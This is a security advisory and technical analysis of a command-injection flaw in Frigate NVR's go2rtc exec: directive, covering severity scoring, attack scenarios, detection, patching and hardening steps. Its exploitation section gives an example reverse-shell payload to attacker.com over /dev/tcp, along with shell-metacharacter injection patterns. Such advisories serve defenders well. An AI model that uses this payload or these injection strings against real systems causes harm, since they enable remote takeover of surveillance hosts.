Description
Frigate is a network video recorder (NVR) with realtime local object detection for IP cameras. Prior to 0.16.4, a critical Remote Command Execution (RCE) vulnerability has been identified in the Frigate integration with go2rtc. The application does not sanitize user input in the video stream configuration (config.yaml), allowing direct injection of system commands via the exec: directive. The go2rtc service executes these commands without restrictions. This vulnerability is only exploitable by an administrator or users who have exposed their Frigate install to the open internet with no authentication which allows anyone full administrative control. This vulnerability is fixed in 0.16.4.
EPSS Score:
0%
EUVD-2026-5586: Comprehensive Technical Analysis
Executive Summary
EUVD-2026-5586 (CVE-2026-25643) represents a critical Remote Command Execution (RCE) vulnerability in Frigate, a widely-deployed network video recorder (NVR) with real-time object detection capabilities. The vulnerability achieves a CVSS v3.1 base score of 9.1 (Critical), stemming from insufficient input sanitization in the go2rtc integration that permits arbitrary system command execution.
1. Vulnerability Assessment and Severity Evaluation
Technical Classification
- Vulnerability Type: Remote Command Execution (RCE) via Command Injection
- Attack Complexity: Low (AC:L)
- Privileges Required: High (PR:H) - Administrative access required
- User Interaction: None (UI:N)
- Scope: Changed (S:C) - Exploitation can affect resources beyond the vulnerable component
CVSS v3.1 Breakdown
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Base Score: 9.1 (Critical)
Vector Analysis:
- AV:N (Network): Exploitable remotely over network
- AC:L (Low): No specialized conditions required for exploitation
- PR:H (High): Requires administrative privileges
- UI:N (None): No user interaction needed
- S:C (Changed): Can impact underlying system beyond application scope
- C:H/I:H/A:H: Complete compromise of confidentiality, integrity, and availability
Severity Justification
Despite requiring administrative privileges (PR:H), the 9.1 Critical rating is justified due to:
- Scope Change (S:C): Command execution at the OS level transcends application boundaries
- Complete System Compromise: Full CIA triad impact
- Deployment Context: Many Frigate installations are exposed without proper authentication
- Lateral Movement Potential: Compromised NVR systems often reside on internal networks with access to surveillance infrastructure
2. Attack Vectors and Exploitation Methods
Primary Attack Vector
Configuration File Injection via go2rtc Integration
The vulnerability exists in the video stream configuration mechanism where the exec: directive in config.yaml is processed without sanitization:
# Vulnerable configuration example
go2rtc:
streams:
camera_stream:
- exec:/path/to/command; malicious_command
Exploitation Scenarios
Scenario A: Authenticated Administrator Attack
Prerequisites:
- Valid administrative credentials
- Access to Frigate web interface or configuration file
Attack Flow:
- Attacker authenticates with admin credentials
- Modifies
config.yamlor uses web interface to inject maliciousexec:directive - go2rtc service processes configuration and executes injected commands
- Attacker gains shell access with Frigate service privileges
Example Payload:
go2rtc:
streams:
malicious_stream:
- exec:ffmpeg -i /dev/null; bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
Scenario B: Unauthenticated Attack (Misconfigured Installations)
Prerequisites:
- Frigate exposed to internet without authentication
- Default or weak administrative controls
Attack Flow:
- Attacker discovers exposed Frigate instance (Shodan, Censys)
- Accesses administrative interface without authentication
- Injects command execution payload via stream configuration
- Establishes persistent backdoor
Scenario C: Supply Chain/Insider Threat
Prerequisites:
- Access to configuration management systems
- Compromised CI/CD pipeline
Attack Flow:
- Malicious configuration injected through automated deployment
- Multiple Frigate instances compromised simultaneously
- Establishes command-and-control infrastructure across surveillance network
Technical Exploitation Details
Command Injection Techniques:
# Shell metacharacter injection
exec:legitimate_command; malicious_command
# Command substitution
exec:legitimate_command `malicious_command`
# Pipe chaining
exec:legitimate_command | malicious_command
# Background execution
exec:legitimate_command & malicious_command
Post-Exploitation Activities:
- Privilege escalation to root (if service runs with elevated privileges)
- Credential harvesting from configuration files
- Network reconnaissance and lateral movement
- Video feed manipulation or exfiltration
- Persistent backdoor installation
- Cryptocurrency mining deployment
3. Affected Systems and Software Versions
Affected Products
- Product: Frigate NVR
- Vendor: blakeblackshear
- Affected Versions: All versions < 0.16.4
- Fixed Version: 0.16.4 and later
Vulnerable Component
- go2rtc integration module - Real-time streaming component
- Configuration parser - YAML processing without input validation
Deployment Environments at Risk
-
Home Surveillance Systems
- Residential NVR deployments
- Smart home integrations (Home Assistant, etc.)
-
Small-to-Medium Business (SMB)
- Retail surveillance
- Office security systems
- Warehouse monitoring
-
Critical Infrastructure
- Building management systems
- Industrial facility monitoring
- Transportation hubs
-
European Deployment Considerations
- GDPR-regulated video surveillance systems
- Public space monitoring infrastructure
- Cross-border surveillance networks
Detection Methods
Version Identification:
# Check Frigate version
curl http://<frigate-ip>:5000/api/version
# Docker container inspection
docker inspect frigate | grep -i version
# Configuration file review
grep -r "version" /config/
Vulnerability Indicators:
- Frigate version < 0.16.4
- go2rtc integration enabled
exec:directives in stream configuration- Exposed administrative interfaces (ports 5000, 1984)
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1 - Within 24 Hours)
1. Emergency Patching
# Docker deployment update
docker pull ghcr.io/blakeblackshear/frigate:0.16.4
docker-compose down
docker-compose up -d
# Verify patched version
docker exec frigate cat /VERSION
2. Network Isolation
- Remove direct internet exposure
- Implement firewall rules restricting access to trusted networks
- Deploy VPN for remote access
# Example iptables rules
iptables -A INPUT -p tcp --dport 5000 -s 192.168.1.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 5000 -j DROP
3. Configuration Audit
# Search for suspicious exec: directives
grep -r "exec:" /config/config.yaml
# Review for command injection patterns
grep -E "(;|\||&|`|\$\()" /config/config.yaml
Short-Term Mitigations (Priority 2 - Within 1 Week)
4. Authentication Hardening
- Enable mandatory authentication
- Implement strong password policies
- Deploy multi-factor authentication (MFA) if available
- Review and revoke unnecessary administrative accounts
5. Access Control Implementation
# Implement reverse proxy with authentication
# Example nginx configuration
location / {
auth_basic "Restricted Access";
auth_basic_user_file /etc/nginx/.htpasswd;
proxy_pass http://frigate:5000;
}
6. Monitoring and Detection
- Enable comprehensive logging
- Monitor for configuration changes
- Implement SIEM integration for anomaly detection
# Monitor configuration file changes
auditctl -w /config/config.yaml -p wa -k frigate_config_change
# Monitor process execution from Frigate container
auditctl -w /proc -p x -k frigate_process